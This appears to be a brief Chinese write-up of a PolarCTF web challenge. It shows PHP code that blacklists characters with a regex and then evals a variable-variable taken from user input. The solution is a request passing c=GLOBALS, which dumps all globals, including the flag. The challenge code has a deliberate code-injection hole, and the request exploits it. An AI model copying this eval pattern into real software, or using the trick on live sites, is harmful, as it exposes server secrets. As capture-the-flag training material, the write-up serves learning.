【PolarCTF】$$

大方子2026-01-29 12:12

复制代码

<?php
/*

PolarD&N CTF

*/

highlight_file(__file__);
error_reporting(0); 
include "flag.php";

$a=$_GET['c'];
if(isset($_GET['c'])){
    if(preg_match('/flag|\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $a)){
        die("oh on!!!");}
    
    else{
        eval("var_dump($$a);");}}

可以看到include了flag.php文件，这里我们可以传入$GLOBALS

$GLOBALS是一个关联数组，它包含了当前脚本中所有全局变量的列表。数组的键是变量名，值是对应的变量值。

复制代码

http://a4248af4-6820-48a8-940f-97a9ddd692b5.www.polarctf.com:8090/?c=GLOBALS

上一篇：SQL SERVER—将所有表的cjsj字段改为datetime2(0)，去掉毫秒

下一篇：SwiftUI 光晕动画性能优化：消除托盘缩放卡顿的实战方案

热门推荐

012026年6月AI行业全景：从百模大战到Agent元年，这30天发生了什么？022026 AI 编程工具终极实战指南：Cursor vs Claude Code vs Copilot，开发者该怎么选？032026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 04HTTP 与 HTTPS 的区别：从原理到实战详解 05【AI】2026 年具身智能模型和世界模型总结 06GitHub 镜像站点 07上线仅72小时被强制下架：Claude Fable 5 的短命 08AI科技热点日报 | 2026年6月1日 09Codex 下载安装指南：Windows 和 macOS 官方版下载 10Claude Code、Codex、Cursor三分天下：2026年AI编程Agent生态全景剖析